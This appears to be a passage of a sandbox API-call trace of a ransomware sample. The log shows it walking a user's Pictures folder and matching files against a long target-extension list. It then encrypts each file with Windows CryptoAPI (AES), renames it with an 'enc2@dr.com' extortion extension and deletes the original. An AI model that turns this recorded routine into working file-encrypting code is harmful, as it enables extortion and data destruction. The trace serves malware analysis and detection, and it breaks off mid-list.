	[0196.108] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.108] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0196.109] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 89
	[0196.109] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.110] WriteFile (in: hFile=0x2c0, lpBuffer=0xff2048*, nNumberOfBytesToWrite=0x14ec0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff2048*, lpNumberOfBytesWritten=0x18c068*=0x14ec0, lpOverlapped=0x0) returned 1
	[0196.116] CloseHandle (hObject=0x2c0) returned 1
	[0196.117] CloseHandle (hObject=0x384) returned 1
	[0196.117] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg")) returned 1
	[0196.131] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg")) returned 0
	[0196.132] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x228be440, ftCreationTime.dwHighDateTime=0x1d972e9, ftLastAccessTime.dwLowDateTime=0x526dc170, ftLastAccessTime.dwHighDateTime=0x1d9756d, ftLastWriteTime.dwLowDateTime=0x526dc170, ftLastWriteTime.dwHighDateTime=0x1d9756d, nFileSizeHigh=0x0, nFileSizeLow=0xcd63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PreumK814_qyh888FxOl.bmp", cAlternateFileName="PREUMK~1.BMP")) returned 1
	[0196.132] lstrcmpW (lpString1="PreumK814_qyh888FxOl.bmp", lpString2="..") returned 1
	[0196.132] lstrcmpW (lpString1="PreumK814_qyh888FxOl.bmp", lpString2=".") returned 1
	[0196.132] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0196.132] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="PreumK814_qyh888FxOl.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\PreumK814_qyh888FxOl.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\PreumK814_qyh888FxOl.bmp"
	[0196.132] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\PreumK814_qyh888FxOl.bmp") returned 55
	[0196.132] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.133] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\PreumK814_qyh888FxOl.bmp", cchLength=0x37 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp") returned 0x37
	[0196.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.133] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.133] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp") returned="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp"
	[0196.133] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp") returned 55
	[0196.133] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.133] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.134] StrStrW (lpFirst=".bmp", lpSrch=".") returned=".bmp"
	[0196.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.134] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bmp") returned=".bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.134] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.134] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.134] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0196.139] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xcd63, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xcd63, lpOverlapped=0x0) returned 1
	[0196.142] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.143] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcae68) returned 1
	[0196.144] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.145] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0196.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.145] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.145] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0196.145] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.145] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xcd63, dwBufLen=0xcd63 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xcd70) returned 1
	[0196.147] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.147] RtlMoveMemory (in: Destination=0xfe9ef0, Source=0xfdd180, Length=0xcd63 | out: Destination=0xfe9ef0) 
	[0196.147] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.147] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe9ef0*, pdwDataLen=0x18bc0c*=0xcd63, dwBufLen=0xcd70 | out: pbData=0xfe9ef0*, pdwDataLen=0x18bc0c*=0xcd70) returned 1
	[0196.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.149] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0196.149] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.150] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0196.150] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.150] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0196.150] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.150] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.152] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.152] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0196.153] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 97
	[0196.153] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.154] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe9ef0*, nNumberOfBytesToWrite=0xcd70, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe9ef0*, lpNumberOfBytesWritten=0x18c068*=0xcd70, lpOverlapped=0x0) returned 1
	[0196.159] CloseHandle (hObject=0x2c0) returned 1
	[0196.159] CloseHandle (hObject=0x384) returned 1
	[0196.159] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp")) returned 1
	[0196.168] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\preumk814_qyh888fxol.bmp")) returned 0
	[0196.168] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9063770, ftCreationTime.dwHighDateTime=0x1d9668d, ftLastAccessTime.dwLowDateTime=0xed575890, ftLastAccessTime.dwHighDateTime=0x1d9671c, ftLastWriteTime.dwLowDateTime=0xed575890, ftLastWriteTime.dwHighDateTime=0x1d9671c, nFileSizeHigh=0x0, nFileSizeLow=0x14600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r5M3RR4fp_k2fKf4.jpg", cAlternateFileName="R5M3RR~1.JPG")) returned 1
	[0196.168] lstrcmpW (lpString1="r5M3RR4fp_k2fKf4.jpg", lpString2="..") returned 1
	[0196.169] lstrcmpW (lpString1="r5M3RR4fp_k2fKf4.jpg", lpString2=".") returned 1
	[0196.169] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0196.169] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="r5M3RR4fp_k2fKf4.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\r5M3RR4fp_k2fKf4.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\r5M3RR4fp_k2fKf4.jpg"
	[0196.169] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\r5M3RR4fp_k2fKf4.jpg") returned 51
	[0196.169] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.169] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\r5M3RR4fp_k2fKf4.jpg", cchLength=0x33 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg") returned 0x33
	[0196.170] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.170] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.170] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg") returned="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg"
	[0196.170] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\r5m3rr4fp_k2fkf4.jpg") returned 51
	[0196.170] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.171] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.171] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0196.171] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.171] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite